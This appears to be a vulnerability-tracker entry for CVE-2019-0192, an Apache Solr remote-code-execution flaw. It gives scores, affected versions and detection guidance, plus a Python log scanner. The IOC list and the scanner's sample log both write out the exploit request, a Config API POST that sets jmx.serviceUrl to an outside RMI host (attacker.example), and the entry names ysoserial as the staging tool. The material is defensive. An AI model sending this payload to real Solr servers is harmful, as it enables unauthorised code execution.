CVE-2019-0192
published 2019-03-07


Priority: P1 (90) · critical · 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Flags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 77.51% (99.5th percentile)
In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.

Affected (4 ranges)

Vendor                      Product      Version range    Fixed in
apache                      solr         5.0.0 – 5.5.5    (none listed)
apache                      solr         6.0.0 – 6.6.5    (none listed)
apache_software_foundation  apache_solr  (none listed)    (none listed)
debian                      lucene-solr  (none listed)    (none listed)

Detection & IOCs (extracted from sources)

url      GET /solr/admin/cores?wt=json HTTP/1.1
url      POST /solr/{{core_name}}/config HTTP/1.1
command  {"set-property":{"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}/obj"}}
port     8983
path     /solr/admin/cores
path     /solr/{{core_name}}/config
other    service:jmx:rmi:///jndi/rmi://<host>:<port>/jmxrmi
  • Detect exploit attempts by monitoring for HTTP POST requests to /solr/<core>/config containing the 'set-property' JSON key with 'jmx.serviceUrl' pointing to an external RMI host.
  • Detect outbound RMI connections from the Solr server to unexpected external hosts, which indicates the JMX serviceUrl was successfully set to a malicious RMI listener.
  • Match on Nuclei template matchers: HTTP 500 status, response body containing 'javax.management.remote.rmi', and Content-Type 'text/plain' in combination with a POST to /solr/<core>/config.
  • Trend Micro Deep Security / Vulnerability Protection DPI rule 1009601 covers this CVE.
  • Trend Micro TippingPoint MainlineDV filter 313798 covers this CVE.
  • The ysoserial tool with the JRMPListener payload class is used to stage the malicious RMI server in exploitation of this CVE.
  • Affected versions are Apache Solr 5.0.0–5.5.5 and 6.0.0–6.6.5 only; versions 7.0 and later are not vulnerable.
  • The Nuclei template requires two sequential HTTP requests: first a GET to /solr/admin/cores to extract a valid core name, then the POST exploit to /solr/<core>/config.
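The first two detection bullets above describe a rule but not how to apply it to traffic. The following Python is an added example written for this page (it is not cvebase's code, nor the Nuclei template): it runs the rule over a few constructed request-log lines in an assumed tab-separated `METHOD<TAB>PATH<TAB>BODY` format, flags POSTs to /solr/<core>/config whose JSON body sets `jmx.serviceUrl`, and grades the finding by whether the RMI host in that URL is outside an assumed allowlist of local hosts. It generalizes the bullet slightly by also surfacing (at low severity) serviceUrl changes that point at an allowlisted host, since any change to this setting on a 5.x/6.x Solr is worth reviewing.

```python
import json
import re

# POST /solr/<core>/config, with or without a query string (Config API endpoint named on the page)
CONFIG_PATH = re.compile(r"^/solr/(?P<core>[^/?]+)/config(?:\?.*)?$")
# Host part of service:jmx:rmi:///jndi/rmi://<host>:<port>/<name> (form shown in the IOC list)
RMI_HOST = re.compile(r"jndi/rmi://(?P<host>[^:/]+)(?::(?P<port>\d+))?", re.IGNORECASE)

# Assumed allowlist: RMI registries that a legitimate JMX setup on this host might reference.
TRUSTED_RMI_HOSTS = {"localhost", "127.0.0.1", "::1"}


def extract_jmx_service_url(body):
    """Return the jmx.serviceUrl value from a Config API 'set-property' body, or None."""
    try:
        doc = json.loads(body)
    except (ValueError, TypeError):
        return None  # non-JSON bodies cannot carry this command
    if not isinstance(doc, dict):
        return None
    props = doc.get("set-property")
    if not isinstance(props, dict):
        return None
    value = props.get("jmx.serviceUrl")
    return value if isinstance(value, str) else None


def check_request(method, path, body):
    """Apply the detection rule to one request; return a finding dict or None."""
    if method.upper() != "POST":
        return None
    m = CONFIG_PATH.match(path)
    if not m:
        return None
    url = extract_jmx_service_url(body)
    if url is None:
        return None
    host_match = RMI_HOST.search(url)
    host = host_match.group("host").lower() if host_match else None
    # Unparseable host is treated as external: it is still an unexpected serviceUrl change.
    external = host is None or host not in TRUSTED_RMI_HOSTS
    return {
        "core": m.group("core"),
        "jmx_service_url": url,
        "rmi_host": host,
        "external": external,
        "severity": "high" if external else "low",
    }


def scan_log(log_text):
    """Run check_request over tab-separated 'METHOD\\tPATH\\tBODY' lines; return all findings."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        parts = line.split("\t", 2)
        method, path = parts[0], parts[1]
        body = parts[2] if len(parts) == 3 else ""
        finding = check_request(method, path, body)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample log (not real traffic): recon GET, the attack POST, a benign config change,
# a local-only JMX change, and a malformed body.
SAMPLE_LOG = "\n".join([
    "GET\t/solr/admin/cores?wt=json\t",
    "POST\t/solr/mycore/config\t"
    '{"set-property":{"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://attacker.example:1099/obj"}}',
    "POST\t/solr/mycore/config\t"
    '{"set-property":{"query.filterCache.size":"1024"}}',
    "POST\t/solr/mycore/config\t"
    '{"set-property":{"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://localhost:1099/jmxrmi"}}',
    "POST\t/solr/mycore/config\tnot json at all",
])

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"].upper(), f["core"], f["rmi_host"], f["jmx_service_url"])
```

Pair this with the second bullet's network-side check: a high-severity hit here followed by an outbound connection from the Solr host to the same RMI host is the strongest confirmation that the property change took effect.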

CVSS provenance

Source          Version  Score  Severity  Vector
nvd             v3.0     9.8    CRITICAL  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd             v2.0     7.5    HIGH      AV:N/AC:L/Au:N/C:P/I:P/A:P
osv             -        9.8    CRITICAL  -
vulncheck       -        9.8    CRITICAL  -
vendor_debian   -        9.8    LOW       -
vendor_oracle   -        9.8    CRITICAL  -
vendor_redhat   -        9.8    CRITICAL  -